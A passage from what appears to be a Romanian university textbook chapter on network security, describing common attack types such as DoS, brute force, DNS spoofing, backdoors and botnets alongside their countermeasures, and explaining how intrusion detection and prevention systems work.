lucru corelând cantități uriașe de informații despre amenințări la nivel mondial, nu numai pentru a
bloca activitatea rău intenționată, ci și pentru a urmări progresul fișierelor suspecte și a malware-
ului în întreaga rețea în scopul prevenirii răspândirii focarelor și a reinfectării.
Securitatea dispozitivelor mobile. Procentul de utilizare a aplicațiilor corporative pe
dispozitive mobile personale crește în mod constant, iar infractorii cibernetici vizează tot mai mult
dispozitivele și aplicațiile mobile. Acest fapt implică necesitatea atât a controlului dispozitivelor
care pot accesa rețeaua companiei, cât și configurarea conexiunilor pentru a menține traficul în
rețeaua privată.
Segmentarea rețelei presupune organizarea echipamentelor și aplicațiilor astfel încât să
cunoaștem care echipament accesează care aplicație și să restricționăm accesul fiecărui echipament
strict la alte echipamente sau aplicații de care este nevoie în activitatea curentă. Astfel apare
posibilitatea de a atribui drepturi de acces bazate pe rol, locație și multe altele, astfel încât dreptul
de acces să fie acordat persoanelor potrivite, iar dispozitivele suspecte sunt oprite și remediate.
Managementul securității informației și a evenimentelor de securitate (Security information
and event management - SIEM). Produsele SIEM colectează informațiile pe care personalul de
securitate trebuie să le identifice și să răspundă la amenințări. Aceste produse vin în diverse forme,
inclusiv dispozitive fizice și virtuale2 sau server software.
VPN. O rețea virtuală privată criptează conexiunea de la un endpoint spre o rețea, conexiune
realizată de obicei prin Internet. În mod obișnuit, VPN cu acces la distanță utilizează IPsec sau
Secure Sockets Layer pentru a autentifica comunicarea dintre dispozitiv și rețea.
Securitatea web. O soluție de securitate web va controla utilizarea web a personalului, va
bloca amenințările bazate pe web și va refuza accesul la site-urile Web rău intenționate. Acesta va
proteja gateway-ul web pe site sau în cloud. „Securitatea Web” se referă, de asemenea, la pașii
făcuți pentru protejarea propriului site web.
Securitate wireless. Rețelele wireless nu sunt la fel de sigure ca cele cu fir. Fără măsuri
stricte de securitate, instalarea unei rețele locale wireless poate fi la fel ca instalarea porturilor
Ethernet peste tot, chiar și în parcare. Pentru a împiedica utilizarea unui exploit, este nevoie de
produse special concepute pentru protecția rețelelor fără fir.
Toate aceste instrumente și măsuri de protecție a rețelei întreprinderii trebuiesc specificate în
politicile respective de securitate: cele de guvernare, cele tehnice, precum și în documentația și
specificațiile particulare ale acestor politici.

11.2. Atacuri asupra rețelelor de calculatoare


Rețelele de calculatoare sunt în permanență ținta unor atacuri, fie ele pasive sau active, iar
fără aplicarea măsurilor și a controalelor de securitate aceste atacuri s-ar putea încununa cu succes.

11.2.1 Noțiune de atac pasiv și atac activ


În cadrul atacurilor pasive intrusul observă informația ce trece prin „canal” fără să
interfereze cu fluxul sau conținutul mesajelor. Atacurile pasive se realizează prin scanarea
dispozitivelor pentru depistarea vulnerabilităților, analiza traficului pentru citirea identității părților
care comunică și „învățarea” lungimii și frecvenței mesajelor vehiculate pe un anumit canal logic,

2
Un dispozitiv virtual este un simulator de dispozitiv hardware.
chiar dacă conținutul acestora este neinteligibil. Atacurile pasive au următoarele caracteristici
comune:
 nu cauzează pagube (nu se șterg sau se modifică date);
 încalcă regulile de confidențialitate;
 obiectivul este de a „asculta” datele schimbate prin rețea;
 nu afectează traficul rețelei;
 facilitează observarea modificările din rețea (echipamente nou introduse, schimbarea
configurărilor) și furtul de informații.
Aceste atacuri pot fi realizate printr-o varietate de metode, cum ar fi supravegherea
legăturilor telefonice sau radio, exploatarea radiaţiilor electromagnetice emise, rutarea datelor prin
noduri adiționale mai puțin protejate. Pentru contracararea acestor atacuri se dezvoltă sisteme de
prevenţie şi detecţie a intruşilor în reţea, fie ca soluţii software, fie cu echipamente dedicate (de
exemplu, prin măsurători de câmp radiat pentru stabilirea ariei de acoperire a unei reţele wireless).
Din punct de vedere al acestor atacuri, reţelele optice sunt cel mai bine protejate, fiind
practic imposibilă interceptarea traficului fără a se sesiza prezenţa intrusului. Riscurile cele mai
mari de atac pasiv, de intercepţie a informaţiilor din reţea (date propriu-zise sau de identificare) apar
în reţelele wireless. Reţelele cablate, cu cabluri cu conductoare metalice, sunt vulnerabile la atacuri
pasive în nodurile de comunicaţie de tip hub sau switch. Atacurile pasive nedetectate care au ca
finalitate preluarea cheilor de criptare reprezintă un risc major pentru reţea, întrucât prin
necunoașterea cheilor compromise se creează breşe în sistemul de securizare a informaţiilor prin
criptarea traficului.
Exemple de atacuri pasive sunt ascultarea (eavesdropping), când atacatorul interceptează
traficul din rețea dintre un calculator și un punct de acces, interceptarea pachetelor (packet
sniffing), când intrusul este conectat la rețea și poate prelua informații din pachetele transmise ș.a.
Atacuri active sunt acele atacuri în care intrusul se angajează fie în furtul mesajelor, fie în
modificarea, reluarea mesajelor sau inserarea de mesaje false. Aceasta înseamnă că el poate șterge,
întârzia sau modifica mesaje, poate să facă inserarea unor mesaje false sau vechi, poate schimba
ordinea mesajelor, fie pe o anumită direcție, fie pe ambele direcții ale unui canal logic. Aceste
atacuri sunt serioase, deoarece modifică starea sistemelor de calcul, a datelor sau a sistemelor de
comunicații. Printre amenințările active se numără mascarada, reluarea3, modificarea mesajelor,
man-in-the-middle, refuzul serviciului, repudierea serviciului.
În cadrul atacurilor active se înscriu și unele programe create cu scop distructiv și care
afectează, uneori esențial, securitatea calculatoarelor prin citirea informațiilor neautorizate,

3
Reluarea (replay attack) este o formă de atac de rețea în care o transmisie validă de date este repetată sau amânată în
mod malițios sau în mod fraudulos. Inițiatorul atacului interceptează datele și le transmite, eventual ca parte a unui atac
prin mascaradă, prin înlocuirea pachetelor IP. Reluarea poate fi definită și ca un atac asupra unui protocol de securitate
folosind reluarea mesajelor dintr-un context diferit în contextul urmărit (sau original și așteptat), făcând astfel
participanții onești să creadă că au finalizat cu succes acest protocol.
distrugerea parțiala sau totală a datelor sau chiar a calculatoarelor. Printre aceste programe se
numără: virușii, viermii, calul troian, rețelele botnet, etc.
În conformitate cu rezultatele raportului McAfee Labs Threats Report pentru anii 2015,
2016 și 2017, cele mai des atacuri asupra securității rețelelor în această perioadă au fost: refuzul
accesului (DoS), forța brută, atacuri la browser, atacuri SSL, backdoors, DNS, scanning, botnet,
viermi, etc.

11.2.2. Atacul Denial of Service


Denial of Service (DoS) sau refuzul serviciului împiedică utilizatorii legitimi să acceseze
servicii sau informații. Un atac DoS poate fi definit ca un atac ce vizează disponibilitatea unui
calculator sau a unei reţele de calculatoare astfel încât acesta să nu mai poată furniza în mod prompt
serviciul pentru care a fost creat. Putem vorbi de un atac DoS atunci când accesul la un calculator
sau la o reţea a fost blocat sau degradat în mod intenţionat de către acţiunea maliţioasa a unui
utilizator.
Majoritatea atacurilor DoS vizează lăţimea de bandă a reţelei sau conectivitatea. Pentru a
epuiza lăţimea de bandă atacatorul creează un flux mare de date în reţea astfel încât un utilizator
legitim nu mai poate utiliza serviciul oferit de reţea deoarece resursele ei devin epuizate. Un atac
asupra conectivităţii se realizează printr-un număr mare de cereri asupra unui server, astfel încât
acesta nu va mai putea răspunde cererilor utilizatorilor legitimi deoarece resursele sale vor fi
ocupate de cererile atacatorului.
Există două abordări pentru denial-of-service: exploatând vulnerabilităţile ţintei sau
trimiţând un număr foarte mare de cereri aparent legitime. Primul se numeşte atac la vulnerabilităţi
(vulnerability attack), iar al doilea se numeşte atac prin inundaţie (flooding attack).
Atacurile de tip vulnerability attack constau în trimitea anumitor cereri, special construite,
către aplicaţia ţintă care are o vulnerabilitate. Vulnerabilitatea este de obicei un bug de software în
implementare sau un bug în configuraţia default a serviciului. Cererile răuvoitoare de la atacator
constau într-un input neaşteptat pe care programatorul aplicaţiei nu l-a prevăzut. Cererile fac ca
aplicaţia ţintă să intre într-o buclă infinită, să încetinească simţitor, să distrugă, să îngheţe sau să
rebuteze maşina sau să consume o cantitate mare de resurse de memorie şi serviciul să devină
indisponibil utilizatorilor legitimi. Acest proces se numeşte exploatarea vulnerabilităţii, iar cererile
răuvoitoare se numesc exploit.
În unele cazuri, aceste vulnerabilităţi sunt exploatate în sistemul de operare, sau în
protocolul de reţea, precum şi în aplicaţiile programelor. Asta înseamnă că fiecare vulnerabilitate
identificată şi definită reprezintă o victorie şi un pas înainte pentru apărători.
Atacurile de tip flood constau în trimiterea unui număr foarte mare de cereri a căror
procesare consumă din resursele-cheie ale ţintei. De exemplu, cererile complexe pot duce la o
procesare extinsă dedicată ciclurilor CPU, cererile mari pot absorbi lăţimea de bandă, iar cererile
care iniţiază comunicarea cu clienţii noi înghit memorie. Odată ce resursele-cheie sunt secătuite de
atac, utilizatorii legitimi nu pot beneficia de servicii. Trăsătura esenţială a atacurilor flood constă în
faptul că puterea lor rezidă în volum mai mult decât în conţinut. Aceasta are două implicaţii:
 atacatorii pot trimite o varietate de pachete; traficul atacului poate fi făcut, în mod voit,
după asemănarea traficului legitim, ceea ce îngreunează serios apărarea.
 fluxul traficului poate fi atât de mare încât să epuizeze resursele ţintei; atacatorul trebuie
să folosească de regulă mai mult de o maşină pentru a expedia un atac. atacurile de flood
sunt, astfel, mai mult atacuri DDoS.
Cea mai simplă formă de atac DDoS poate să trimită o cantitate mare de cereri, către
serviciul oferit de o maşină-victimă. În afara cazului în care între maşinile atacatoare şi cele ale
victimelor intervine ceva care sistează cererea pentru aceste pachete, victima îşi va folosi resursele
în încercarea de a le primi şi gestiona. Dacă sunt destule, toate resursele maşinii vor fi cheltuite în
încercarea de a gestiona pachete fără nici o valoare.
Atacatorul poate, de asemenea, să ia în vizor reţeaua prin care victima se conectează la
Internet. Dacă atacatorul ştie că victima se conectează printr-un segment de reţea de 1 Gbps, atunci
poate trimite atâtea pachete către victimă sau către alte noduri ale segmentului cât să le copleşească.
Cele mai multe reţele devin nefuncţionale atunci când traficul către ele ating capacitatea cu care au
fost construite, aşa încât foarte puţin sau nici un pic din traficul legitim mai ajunge la victimă. Sub
această formă a atacurilor DDoS, toate celelalte noduri ale segmentului de reţea vor suferi în acelaşi
mod. Acest exemplu ilustrează o caracteristică ciudată a DoS: pagubele nu depind doar de victimă,
dar şi de utilizatorii ei legitimi (care nu pot obţine serviciul) şi de oricine care foloseşte la comun
resursele critice.
Cea mai avansată formă a atacului DoS o reprezintă atacurile distribuite care se bazează pe
arhitectura Internetului. Aceste atacuri utilizează mai multe calculatoare pentru a lansa un atac DoS
coordonat asupra unei sau mai multor ţinte. Folosind tehnologia client/server, atacatorul este
capabil să amplifice eficacitatea atacului DoS în mod semnificativ prin valorificarea resurselor mai
multor calculatoare complice fără voia lor, ce sunt folosite ca şi platforme de atac.
Software-ul antivirus, firewall-urile și filtrele de e-mail ar putea elimina un atac DoS și ajuta
la gestionarea traficului nedorit.

11.2.3. Atacurile bazate pe browser


Atacurile bazate pe browser încearcă să înșele navigatorii pe Internet să descarce malware
care este deghizat ca o aplicație software sau o actualizare. Infractorii se pot adresa, de asemenea,
sistemelor de operare și aplicațiilor populare, prin utilizarea unui exploit, care poate fi o secvență de
date sau o serie de comenzi, care profită de o vulnerabilitate în sistem.
Atacurile de browser pot fi atenuate de actualizări obișnuite atât în browser, cât și în
aplicațiile conexe, cum ar fi Flash și Java.
11.2.4. Atacurile de tip brute-force
Atacurile de tip brute-force (forță brută) reprezintă, după unele analize, circa un sfert din
toatele atacurile pe rețea. Ele sunt folosite pentru a sparge o parolă sau un PIN-cod și, spre
deosebire de alte atacuri care caută o cale de acces ascunsă, forța brută este folosită pentru a
deschide ușa din față. Aceste atacuri presupun folosirea unor combinaţii succesive de caractere
alfanumerice de lungimi diferite (în ordine crescătoare). Atacurile cu forța brută necesită timp mult
şi putere de calcul foarte mare, și cel mai frecvent ele utilizează software-ul automatizat pentru a
ghici mii sau milioane de combinații de parole, având în general succes împotriva parolelor uşor de
ghicit şi cu lungimi de 6-7 caractere.
Modalitățile de apărare împotriva atacurilor brute-force constau în blocarea conturilor după
o serie de încercări de conectare, blocarea adreselor IP după mai multe eșecuri de conectare,
restricționarea accesului la conectare la anumite adrese IP și, desigur, schimbarea frecventă a
parolelor și utilizarea unor combinații ciudate de numere, litere, simboluri și cazuri.

11.2.5. Atacurile asupra SSL


Atacurile asupra SSL (Secure Sockets Layer attack) vizează interceptarea datelor trimise
printr-o conexiune criptată. Un atac de succes permite accesul la informațiile încă necriptate.
Atacurile SSL au fost mai populare la sfârșitul anului 2014, dar rămân și astăzi destul de utilizate. O
creștere accentuată a atacurilor SSL a avut ca urmare descoperirea mai multor vulnerabilități de
securitate în SSL și TLS, inclusiv cea utilizată de atacul POODLE 4, toate versiunile protocoalelor
de criptare SSL (1.0 - 3.0) și TLS 1.0 fiind deja considerate vulnerabile la atac și ar trebui evitate.

11.2.6. Scanarea porturilor


Scanarea porturilor este un atac care constă în căutări ostile pe Internet pentru porturi
deschise prin care atacatorii pot avea acces la un computer. Această ameninţare nu este un atac în
sine, dar de obicei precedă un atac, întrucât este unul dintre cele mai folosite mijloace de a obţine
informaţii despre un computer la distanţă. Porturile UDP/TCP folosite de instrumentele de reţea de
pe computerul vizat de un intrus sunt scanate pentru a depista starea acestora (închise sau deschise).
Scanările de porturi pot indica unui hacker ce tipuri de atacuri funcţionează sau nu pentru
acel sistem. În plus, informaţiile obţinute prin scanare (un model al sistemului) îl informează pe
răufăcător despre tipul de sistem de operare folosit de computerul la distanţă. Aceste informaţii
restrâng numărul de atacuri potenţiale şi, implicit, perioada de timp petrecută pentru executarea lor.
De asemenea, ele îl ajută pe un hacker în încercarea de a folosi vulnerabilităţi specifice acelui
sistem de operare.

4
Atacurile POODLE au exploatat vulnerabilitatea SSL 3.0 cu cipuri bazate pe cifrarea bloc cu înlănțuire (CBC),
permițând atacatorilor să acceseze parole, cookie-uri și alte tokene de autentificare. Vulnerabilitatea POODLE a fost
eliminată în 2014, iar SSL 3.0 este considerat un protocol învechit.
Protecția de aceste atacuri constă în a lăsa activ doar traficul de care este nevoie pentru a
accesa host-urile interne (de preferință, pe cât posibil, traficul de la gazdele pe care încercăm să le
protejăm) și a refuza orice altceva. Acest lucru este valabil pentru porturile standard, cum ar fi TCP
80 pentru HTTP și ICMP pentru cererile de ping. De asemenea trebuie de configurat firewall-urile
să caute comportamente potențial dăunătoare în timp precum și de avut reguli în vigoare pentru a
întrerupe atacurile în cazul în care se atinge un anumit prag, cum ar fi 10 scanări la un port într-un
minut sau 100 de solicitări ping (ICMP) consecutive. Cele mai multe firewall-uri și IPS-uri pot
detecta o astfel de scanare și o pot deconecta în timp real.

11.2.7. Atacuri DNS


DNS - Domain Name Servers este un serviciu de registru Internet distribuit. DNS-ul
translatează (“mapează”) de fapt din numele domeniului (sau nume ale maşinilor de calcul) în
adrese IP şi din adrese IP în nume. Translatarea numelui în adresa IP se numeşte “rezolvarea
numelui de domeniu”. Cele mai multe servicii Internet se bazează pe DNS şi dacă acesta cade, site-
urile web nu pot fi găsite iar livrarea pachetelor se blochează.
DNS spoofing (sau fragmentarea DNS) este atunci când datele sunt introduse în memoria
cache a sistemului de nume de domeniu, determinând serverul de nume să returneze o adresă IP
incorectă, care redirecționează traficul către un computer alternativ selectat de către atacator.
Cererile DNS vin prin portul 53, pe care firewall-urile tradiționale îl lasă deschis.
DNS hijacking (sau deturnare DNS) este un tip de atac de rețea care redirecționează
utilizatorii către un site fals atunci când încearcă să acceseze unul legitim. Multe companii nu
protejează DNS deoarece nu realizează că este un vector de amenințare.
Soluțiile pentru atacurile DNS includ utilizarea unui port sursă aleatorie, precum și
actualizarea și aplicarea patch-urilor de securitate.

11.2.8. Atacurile backdoor


Backdoor-urile sunt aplicații care permit accesul calculatoarelor la distanță. Multe din ele
sunt proiectate pentru a ocoli sistemele de detectare a intruziunilor. Un backdoor lucrează în fundal
şi se ascunde de utilizator. Este foarte similar cu alţi viruşi de tip malware, şi, prin urmare, destul de
dificil de detectat. Un backdoor face parte dintre cele mai periculoase tipuri de paraziţi, şi oferă unei
persoane maliţioase abilitatea de a efectua orice acţiune posibilă într-un calculator compromis.
Atacatorul poate folosi un backdoor pentru a spiona utilizatorul, să administreze fişierele ei/lui, să
instaleze alte software-uri sau ameninţări periculoase, să controleze întreg sistemul PC-ului şi să
atace alte gazde. Deseori, un backdoor prezintă alte abilităţi distructive, precum urmărirea tastelor
apăsate de la tastatura, capturi ale ecranului, infectarea şi criptarea fişierelor. Un astfel de parazit
este o combinaţie de diferite ameninţări de confidenţialitate şi securitate, care lucrează pe cont
propriu şi nu necesită control.
Vorbind la modul general, backdoor-urile sunt în mod specific troiani, viruşi, keylogger-e,
spyware şi unelte de administrare de la distanţă. Acţionează în aceeaşi manieră precum aplicaţiile
virale. Totuşi, funcţiile lor şi sarcinile utile sunt mult mai complexe şi periculoase, deci sunt grupate
într-o categorie specială.
Protecția de atacurile backdoor. Multe dintre atacurile backdoor sunt capabile să prevină
detectarea lor de multe dintre instrumente specifice utilizate, deci protejarea rețelei de aceste atacuri
poate fi dificilă. Cu toate acestea, există strategii care pot fi utilizate pentru a reduce astfel de
riscuri. În primul rând, companiile ar trebui să aibă firewall-uri care să fie capabile să blocheze
punctele de intrare pentru toți, în afară de utilizatorii autorizați. Acest lucru este deosebit de
important, deoarece execuția unui atac backdoor port binding este aproape imposibilă dacă ar exista
un firewall.
În plus, este benefică și utilizarea unei soluții anti-malware, dar și monitorizarea robustă a
rețelei, în special a oricăror programe bazate pe open-source.
Atacurile de tip backdoor reprezintă o amenințare considerabilă pentru întreprinderi, însă
înțelegerea modului în care ele se realizează și a modului în care pot fi prevenite poate duce la o
protecție mai bună.

11.2.9. Atacurile Shellshock


Atacurile Shellshock se referă la vulnerabilitățile găsite în Bash, o linie de comandă comună
pentru sistemele Linux și Unix. Când cercetătorii de securitate au descoperit Shellshock în
septembrie 2014, milioane de sisteme și aparate, de la serverele web la termostate, s-au dovedit a fi
vulnerabile. Atacatorii au început să le exploateze, folosindu-le pentru a instala programe malware
care trimit spam și realizează atacuri DDoS. Deoarece multe sisteme nu sunt niciodată actualizate,
vulnerabilitățile sunt încă prezente pe Web, problema fiind încă destul de răspândită.

11.2.10. Atacuri de tip Botnet


Un botnet este un grup de computere deturnate care sunt controlate de la distanță de unul sau
mai mulți actori rău-intenționați. Rețelele sunt asaltate de obicei cu încercări de a le infecta
calculatoarele cu programe malware, care să le includă în armata de roboți a unui hacker.
Atacatorii folosesc botneturi pentru activități rău intenționate sau închiriază botnet-ul pentru
a efectua activități rău intenționate pentru ceilalți, cum ar fi de exemplu lansarea atacurilor DDoS,
trimiterea e-mailurilor spam, practicarea fraudei de click5, etc.
Cea mai bună metodă de protecție împotriva atacurilor botnet este pentru început prezența
produselor de securitate corespunzătoare. Pentru companii, locul de protecție primară se află la
poarta de acces. Securitatea gateway-ului, însă, poate să nu fie suficientă atunci când utilizatorii și

5
Frauda de click are loc atunci când un utilizator sau bot, dă click în mod intenționat pe un link, cu intenția de a taxa pe
cineva pentru acel click. De multe ori, nu există un interes în ceea ce privește rezultatul final, ci se creează un impact
catastrofic asupra agenției, dar și a bugetului clienților, în final, sesizându-se un rezultat total negativ.
vizitatorii de telefonie mobilă se conectează în interiorul gateway-ului. Controlul adecvat al
accesului și autentificarea puternică (sau cel puțin cu două factori) vor contribui la consolidarea
apărării în acest caz.
În tabelul 11.1 sunt prezentate câteva tipuri de atac în rețea, eventualele consecințe, și unele
tehnici defensive utilizate pentru aceste atacuri.
Tabelul 11.1. Atacului de rețea, consecințe și măsuri de contracarare
Tipul
Consecințe eventuale Contramăsuri
atacului
Aflarea informațiilor importante sau a
Analiza
fișierelor de date prin monitorizarea Criptarea
traficului
caracteristicilor traficului
Performanța slabă a rețelei, terminarea Firewall-uri externe împreună
DoS necorespunzătoare a serviciilor prin trimiterea cu filtre, sisteme de detectare a
de date nevalide, blocarea traficului intruziunilor
Performanța slabă a rețelei, indisponibilitatea
DDoS Firewall-uri, IDS, IPS
serviciilor, rețelei, paginilor web
ICMP Întreruperea conexiunii în rețea, prăbușirea Inspecția și filtrarea pachetelor
flood sistemului TCP, ICMP, firewall-uri, IDS
Prăbușirea sistemului de operare,
SYN flood Filtrare, firewall, proxy
indisponibilitatea serverului
Modificarea, ștergerea și redirecționarea Ingress filtering, use
Spoofing
informației strong authentication
Citirea, modificarea, ștergerea datelor, Criptografia, autentificarea
Man-in-
terminarea necorespunzătoare a aplicațiilor, puternică, utilizarea funcțiilor
middle
prăbușirea sistemului hash
Aplicarea validării la intrare,
Buffer Prăbușirea sistemului și SO, ocolirea utilizarea de biblioteci sigure,
overflow serviciilor de securitate cunoașterea limbajelor de
programare
Divulgarea numelor de utilizator, a parolei, a Firewall-uri, filtre spam,
Phishing
informației confidențiale antivirus, antispyware
Citirea, modificare și ștergerea cu ușurință a
Criptarea end-to-end,
Sniffing datelor, modificarea informației de
segmentarea corectă a rețeli
configurare

11.3. Sisteme de detectare și prevenire a intruziunilor

11.3.1. Noțiune de IDS


Sistemele de detectare a intruziunilor (IDS – intrusion detection system) sunt aplicații
software sau dispozitive hardware concepute pentru a detecta faptele de acces neautorizat
(intruziune sau atacuri de rețea) într-un sistem informatic sau într-o rețea. IDS reprezintă o soluție
de securitate a rețelei care devine din ce în ce mai mult o completare necesară la infrastructura de
securitate a rețelei, fiind considerat a doua linie de defensivă în rețea (prima fiind un firewall).
Utilizate împreună cu firewall-urile, care funcționează pe baza politicii de securitate, IDS servesc ca
mecanisme pentru monitorizarea și observarea activității suspecte. Aceste sisteme pot detecta
atacatorii care au ocolit firewall-ul și pot emite un raport către administrator care, la rândul său, va
lua măsuri suplimentare pentru a preveni atacul. Tehnologiile de detectare a penetrării rețelelor nu
fac sistemul absolut sigur, cu toate acestea, există un beneficiu practic al IDS și acesta nu este deloc
de neglijat.
Utilizarea IDS ajută la atingerea mai multor obiective, ca de exemplu:
 detectarea intruziunii sau atacului de rețea;
 prezicerea eventualelor viitoare atacuri și identificarea vulnerabilităților pentru a
preveni dezvoltarea lor ulterioară (atacatorul efectuează, de obicei, o serie de acțiuni
preliminare, cum ar fi, de exemplu, scanarea rețelei sau alte teste pentru a detecta
vulnerabilitățile sistemului țintă);
 documentarea amenințărilor existente;
 asigurarea controlului calității administrării rețelei din punct de vedere al securității,
în special în rețelele mari și complexe;
 obținerea informațiilor utile despre intruziunile care au fost realizate cu succes de
către atacatori, pentru a restabili și a corecta factorii care au cauzat penetrarea rețelei;
 determinarea locației sursei de atac în raport cu rețeaua locală (atacuri externe sau
interne), care este importantă atunci când se ia decizia de amplasare a resurselor în
rețea.

11.3.2. Arhitectura IDS


Cea mai comună implementare a sistemelor IDS include:
 un subsistem de tip senzor, conceput pentru a colecta evenimente legate de
securitatea rețelei sau a sistemului protejat;
 un subsistem de analiză, destinat detectării atacurilor de rețea și a acțiunilor suspecte;
 un depozit, în care se acumulează evenimentele primare și rezultatele analizelor;
 consola de administrare, care vă permite configurarea IDS-ului, monitorizarea stării
sistemului protejat și a sistemului IDS, vizualizarea incidentelor detectate de
subsistemul de analiză.
În funcție de modul de realizare a monitorizării, sistemele IDS sunt împărțite în IDS de reţea
(Network IDS – NIDS) și IDS de staţie (Host IDS – HIDS), (figura 11.1).
Figura 11.1. Network IDS care analizează tot traficul din afara perimetrului rețelei

Principalele IDS-uri comerciale sunt cele de rețea. Aceste sisteme IDS detectează atacurile
prin captarea și analiza pachetelor de rețea. Ascultând un segment de rețea, NIDS poate cerceta
traficul de rețea de la mai multe stații care sunt atașate la segmentul de rețea, realizând astfel
protecția acestor stații.

11.3.3. Avantaje și dezavantaje ale IDS


Printre avantajele utilizării unor IDS de rețea se numără:
 acoperirea mare pentru monitorizare, ceea ce implică un management centralizat -
câteva NIDS, localizate în mod optim, pot vizualiza o rețea mare.
 nu afectează performanța și topologia rețelei - NIDS sunt, de obicei, dispozitive
pasive care asculta segmente de rețea fără a afecta funcționarea normală, ceea ce de
obicei permite să fie ușor de modificat topologia rețelei pentru a găzdui astfel de
IDS-uri.
NIDS au însă și unele dezavantaje:
 au nevoie de resurse destul de semnificative - pentru NIDS, poate fi dificil să se
manipuleze toate pachetele într-o rețea mare sau aglomerată și, prin urmare, aceștia
pot să nu recunoască un atac care a început atunci când traficul este aglomerat;
 necesită configurări și funcționalități suplimentare a dispozitivelor de rețea - de
exemplu, multe comutatoare pe care sunt construite rețelele nu oferă o monitorizare
universală a porturilor, ceea ce limitează diapazonul de monitorizare a senzorilor
NIDS doar la o singură gazdă; chiar și atunci când comutatoarele oferă o astfel de
monitorizare a porturilor, adesea un singur port nu poate acoperi întregul trafic
transmis de comutator;
 NIDS nu pot analiza informațiile criptate - această problemă se amplifică odată cu
utilizarea tot mai frecventă a VPN de către întreprindere (și de către atacatori);
 nu se poate recunoaște rezultatul atacului - NIDS nu poate spune dacă atacul a avut
succes, ele pot determina doar că atacul a fost început; aceasta înseamnă că, după ce
NIDS detectează un atac, administratorul trebuie să examineze manual fiecare gazdă
atacată pentru a determina dacă a avut loc o penetrare reală;
 unele NIDS au probleme cu definirea atacurilor de rețea, care includ pachete
fragmentate - astfel de pachete fragmentate pot provoca funcționarea instabilă a
sistemului IDS.
Spre deosebire de NIDS, HIDS se ocupă de informațiile colectate într-un singur calculator.
Această amplasare avantajoasă îi permite să analizeze activitatea cu o mare fiabilitate și precizie,
identificând numai acele procese și utilizatori care sunt relevante pentru un anumit atac în sistemul
de operare al calculatorului. NIDS utilizează, de obicei, surse de informații de două tipuri:
rezultatele auditului sistemelor de operare și ale jurnalelor de sistem.
Avantajele HIDS:
 au capacitatea de a monitoriza evenimentele locale în raport cu gazda, fiind astfel
capabile să identifice atacuri pe care NIDS nu le pot detecta;
 poate funcționa într-un mediu în care traficul de rețea este criptat - acest lucru devine
posibil atunci când sursele de informație bazate pe gazdă sunt create înainte ca datele
să fie criptate și/sau după ce datele sunt decriptate la gazda destinație;
 nu este nevoie de funcționalități suplimentare ale dispozitivelor de rețea - de
exemplu, funcționarea HIDS nu este afectată de prezența comutatoarelor în rețea.
Dezavantaje ale HIDS:
 nu au un management centralizat - HIDS sunt mai greu de gestionat, deoarece
trebuie să fie configurate și gestionate pentru fiecare gazdă țintă;
 un HIDS poate fi blocat de unele atacuri DoS sau chiar interzis - deoarece cel puțin
sursele de informații (senzorii) sau o parte din instrumentele de analiză pentru HIDS
sunt situate pe aceeași gazdă care este ținta atacului, atunci, ca parte a atacului, IDS
poate fi atacat și interzis;
 au nevoie de resurse semnificative - HIDS utilizează resursele computaționale ale
gazdei pe care o monitorizează, ceea ce afectează performanța sistemului
monitorizat;
 suprafața mică de monitorizare - IDS doar urmărește pachetele de rețea primite de
gazda particulară și nu poate monitoriza întreaga rețea.

11.3.4. Metodele de identificare a traficului rău intenționat


Sistemele IDS se deosebesc prin metodele de identificare a traficului rău intenționat, fiind
clasificate în sisteme IDS bazate pe: semnături (signature), anomalii (anomaly) și analiză a
protocoalelor de tip stateful (stateful protocol analysis detection).
O semnătură reprezintă un model ce corespunde unei ameninţări cunoscute. Detecţia bazată
pe semnături este procesul de comparare a semnăturilor evenimentelor observate pentru a identifica
posibilele incidente.
Avantaje ale metodei bazate pe semnături:
 detectarea eficientă a atacurilor și absența unui număr mare de mesaje false;
 diagnosticarea fiabilă a utilizării unui instrument specific sau a unei tehnologii de
atac.
Acest lucru permite administratorilor, indiferent de nivelul lor de expertiză în domeniul
securității, să înceapă procedurile de manipulare a incidentelor și să adapteze măsurile de securitate.
Dezavantajul principal al acestei metode constă în actualizarea obligatorie a bazei de date
pentru a obține semnături de noi atacuri.
Detecţia anomaliilor reprezintă procesul de comparare a definiţiilor activităţilor ce sunt
considerate normale cu definiţiile evenimentelor observate și are ca scop identificarea abaterile
semnificative. Un IDS ce foloseşte detecția anomaliilor deţine nişte profiluri care reprezintă
comportamentul normal al utilizatorilor, host-urilor din reţea, conexiunilor la reţea sau al
aplicaţiilor. Profilurile sunt dezvoltate prin monitorizarea caracteristicilor activităţii tipice într-o
perioadă de timp
Avantaje ale metodei bazate pe anomalii:
 definirea unui atac fără a cunoaște detalii specifice (semnături);
 detectorii de anomalii pot crea informații care ulterior vor fi folosite pentru a
determina semnăturile de atac.
Printre dezavantajele acestei metode se regăsesc:
 numărul mare de semnale false concomitent cu un comportament imprevizibil al
utilizatorilor și activitatea de rețea imprevizibilă;
 costurile de timp în faza de instruire a sistemului, pe parcursul căreia sunt
determinate caracteristicile comportamentului normal.
Analiza protocoalelor de tip stateful reprezintă procesul de comparare a profilurilor
prestabilite ale definiţiilor, general acceptate, ale activităţilor benigne ale protocoalelor pentru
fiecare stare de protocol împotriva evenimentelor observate pentru a identifica deviaţiile. Spre
deosebire de detecţia anomaliilor, care foloseşte profiluri specifice host-urilor sau reţelei, această
analiză se bazează pe profiluri universale, dezvoltate de diverşi furnizori ce specifică modul în care
ar trebui să fie utilizate sau nu anumite protocoale.”Stateful” înseamnă că IDS-ul este capabil să
înţeleagă şi să urmărească starea protocoalelor specifice nivelului reţea, transport sau aplicaţie, în
cazul celor care au noţiunea de stare.
Avantajul principal al metodei constă în complexitatea analizei realizate ce include
urmărirea simultană a mai multor sesiuni.
Metoda are însă și diverse dezavantaje:
 este o consumatoare foarte mare de resurse, din cauza complexităţii analizei
realizate;
 atacurile care nu încalcă caracteristicile de comportament general acceptat al
protocolului nu sunt detectate (ex: efectuarea mai multor acţiuni benigne într-o
perioadă scurtă de timp pentru a provoca o blocare a serviciului - DoS);
 modelul de protocol utilizat de un IDS ar putea intra în conflict cu modul în care
protocolul este implementat în diferite aplicaţii şi sisteme de operare.

11.3.5. Sisteme de prevenire a intruziunilor


Sistemul de prevenire a intruziunilor (IPS – intrusion prevention system) este un instrument
software sau hardware care monitorizează în timp real o rețea sau un sistem informatic pentru a
detecta, a preveni sau a bloca activitatea rău intenționată.
Sistemele de prevenire a intruziunilor sunt considerate extensii ale sistemelor de detecție
întrucât ambele monitorizează traficul rețelei și/sau activitățile sistemului împotriva acțiunilor
malițioase. Principalele diferențe sunt că, spre deosebire de sistemele de detecție a intruziunilor,
